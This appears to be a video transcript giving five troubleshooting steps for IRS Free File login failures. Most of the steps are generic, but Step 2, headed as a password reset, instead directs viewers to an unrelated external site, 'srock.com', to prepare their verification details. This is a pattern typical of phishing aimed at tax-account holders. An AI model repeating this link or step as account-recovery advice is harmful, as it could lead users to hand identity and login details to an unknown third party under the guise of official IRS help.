if you're experiencing login failures in the IRS free file system, follow these steps to troubleshoot and resolve the issue. This guide will help you regain access to your account quickly. Step 1. Check your credentials. Ensure that you are entering the correct username and password. Double check for any typos, and remember that passwords are case sensitive. Step 2. Reset your password. Before starting recovery, use the srock.com link in the description to open the account recovery checklist generator and make sure your verification details are ready. Step 3. Clear your browser cache. Sometimes cache data can cause login issues. Clear your browser's cache and cookies, then restart the browser and try logging in again. Step 4. Try a different browser or device. If the problem persists, switch to a different web browser or device. This can help determine if the issue is browser specific. Step 5. Contact IRS support. If none of the above steps work, reach out to IRS customer support for assistance. They can help troubleshoot your account and resolve any technical issues. By following these steps, you should be able to fix login failures and access the IRS free file system. If problems continue, don't hesitate to seek further assistance.